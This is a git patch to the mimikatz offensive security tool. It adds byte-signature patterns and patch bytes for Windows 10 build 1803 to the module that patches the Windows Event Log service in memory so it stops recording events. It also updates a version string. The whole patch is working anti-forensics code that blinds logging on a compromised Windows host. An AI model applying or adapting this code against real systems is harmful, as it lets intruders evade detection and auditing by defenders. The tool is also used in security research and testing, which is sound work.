From fe6a853ec3e7ff50d79dd608dbed5e05cfab3322 Mon Sep 17 00:00:00 2001
From: Benjamin DELPY <benjamin@gentilkiwi.com>
Date: Mon, 10 Dec 2018 00:03:02 +0100
Subject: [PATCH] [new] mimikatz eventlog patch for 1803 ( for @darkoperator )
 [new] mimikatz version includes maximum Windows build number tested

---
 inc/globals.h                   | 3 ++-
 mimikatz/modules/kuhl_m_event.c | 8 ++++++--
 2 files changed, 8 insertions(+), 3 deletions(-)

diff --git a/inc/globals.h b/inc/globals.h
index bf531bce..d43ea9c3 100644
--- a/inc/globals.h
+++ b/inc/globals.h
@@ -32,7 +32,8 @@
 #define MIMIKATZ				L"mimikatz"
 #define MIMIKATZ_VERSION		L"2.1.1"
 #define MIMIKATZ_CODENAME		L"A La Vie, A L\'Amour"
-#define MIMIKATZ_FULL			MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__)
+#define MIMIKATZ_MAX_WINBUILD	L"17763"
+#define MIMIKATZ_FULL			MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") #" MIMIKATZ_MAX_WINBUILD L" " TEXT(__DATE__) L" " TEXT(__TIME__)
 #define MIMIKATZ_SECOND			L"\"" MIMIKATZ_CODENAME L"\""
 #define MIMIKATZ_DEFAULT_LOG	MIMIKATZ L".log"
 #define MIMIKATZ_DRIVER			L"mimidrv"
diff --git a/mimikatz/modules/kuhl_m_event.c b/mimikatz/modules/kuhl_m_event.c
index edfe95ac..c094fc96 100644
--- a/mimikatz/modules/kuhl_m_event.c
+++ b/mimikatz/modules/kuhl_m_event.c
@@ -21,6 +21,7 @@ BYTE PTRN_WIN6_Channel__ActualProcessEvent[]	= {0xff, 0xf7, 0x48, 0x83, 0xec, 0x
 BYTE PTRN_WI10_Channel__ActualProcessEvent[]	= {0x48, 0x8b, 0xc4, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x40, 0xc8, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x58, 0x08};
 BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[]	= {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8};
 BYTE PTRN_WN10_1709_Channel__ActualProcessEvent[]	= {0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xca, 0xe8};
+BYTE PTRN_WN10_1803_Channel__ActualProcessEvent[]	= {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x89, 0x6c, 0x24, 0x58, 0x48, 0x89, 0x74, 0x24, 0x60};
 BYTE PTRN_WN10_1809_Channel__ActualProcessEvent[]	= {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x89, 0x74, 0x24, 0x58, 0x49, 0x8b, 0xf0, 0x48, 0x8b, 0xfa, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0xca, 0xe8};
 
 BYTE PATC_WNT6_Channel__ActualProcessEvent[]	= {0xc3};
@@ -33,6 +34,7 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
 	{KULL_M_WIN_BUILD_10_1507,	{sizeof(PTRN_WI10_Channel__ActualProcessEvent),	PTRN_WI10_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
 	{KULL_M_WIN_BUILD_10_1607,	{sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent),	PTRN_WN10_1607_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
 	{KULL_M_WIN_BUILD_10_1709,	{sizeof(PTRN_WN10_1709_Channel__ActualProcessEvent),	PTRN_WN10_1709_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
+	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_WN10_1803_Channel__ActualProcessEvent),	PTRN_WN10_1803_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
 	{KULL_M_WIN_BUILD_10_1809,	{sizeof(PTRN_WN10_1809_Channel__ActualProcessEvent),	PTRN_WN10_1809_Channel__ActualProcessEvent},	{sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},
 };
 #elif defined _M_IX86
@@ -44,12 +46,13 @@ BYTE PTRN_WN63_Channel__ActualProcessEvent[]	= {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x
 BYTE PTRN_WN64_Channel__ActualProcessEvent[]	= {0x33, 0xc4, 0x89, 0x44, 0x24, 0x10, 0x53, 0x56, 0x57, 0xa1};
 BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[]	= {0x8b, 0xd9, 0x8b, 0x4d, 0x08, 0xe8};
 BYTE PTRN_WN10_1709_Channel__ActualProcessEvent[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x0c, 0x56, 0x57, 0x8b, 0xf9, 0x8b, 0x4d, 0x08, 0xe8};
+BYTE PTRN_WN10_1803_Channel__ActualProcessEvent[]	= {0x8b, 0xf1, 0x89, 0x75, 0xec, 0x8b, 0x7d, 0x08, 0x8b, 0xcf, 0xe8};
 BYTE PTRN_WN10_1809_Channel__ActualProcessEvent[]	= {0x8b, 0xf1, 0x89, 0x75, 0xf0, 0x8b, 0x7d, 0x08, 0x8b, 0xcf, 0xe8};
 
 BYTE PATC_WNT5_PerformWriteRequest[]			= {0x33, 0xc0, 0xc2, 0x04, 0x00};
 BYTE PATC_WNO8_Channel__ActualProcessEvent[]	= {0xc2, 0x04, 0x00};
 BYTE PATC_WIN8_Channel__ActualProcessEvent[]	= {0xc2, 0x08, 0x00};
-BYTE PATC_W1809_Channel__ActualProcessEvent[]	= {0xc2, 0x0c, 0x00};
+BYTE PATC_W1803_Channel__ActualProcessEvent[]	= {0xc2, 0x0c, 0x00};
 
 KULL_M_PATCH_GENERIC EventReferences[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WNT5_PerformWriteRequest),			PTRN_WNT5_PerformWriteRequest},			{sizeof(PATC_WNT5_PerformWriteRequest),			PATC_WNT5_PerformWriteRequest},			{-20}},
@@ -60,7 +63,8 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
 	{KULL_M_WIN_BUILD_10_1507,	{sizeof(PTRN_WN64_Channel__ActualProcessEvent),	PTRN_WN64_Channel__ActualProcessEvent},	{sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
 	{KULL_M_WIN_BUILD_10_1607,	{sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent),	PTRN_WN10_1607_Channel__ActualProcessEvent},	{sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
 	{KULL_M_WIN_BUILD_10_1709,	{sizeof(PTRN_WN10_1709_Channel__ActualProcessEvent),	PTRN_WN10_1709_Channel__ActualProcessEvent},	{sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {  0}},
-	{KULL_M_WIN_BUILD_10_1809,	{sizeof(PTRN_WN10_1809_Channel__ActualProcessEvent),	PTRN_WN10_1809_Channel__ActualProcessEvent},	{sizeof(PATC_W1809_Channel__ActualProcessEvent), PATC_W1809_Channel__ActualProcessEvent}, {-12}},
+	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_WN10_1803_Channel__ActualProcessEvent),	PTRN_WN10_1803_Channel__ActualProcessEvent},	{sizeof(PATC_W1803_Channel__ActualProcessEvent), PATC_W1803_Channel__ActualProcessEvent}, {-12}},
+	{KULL_M_WIN_BUILD_10_1809,	{sizeof(PTRN_WN10_1809_Channel__ActualProcessEvent),	PTRN_WN10_1809_Channel__ActualProcessEvent},	{sizeof(PATC_W1803_Channel__ActualProcessEvent), PATC_W1803_Channel__ActualProcessEvent}, {-12}},
 };
 #endif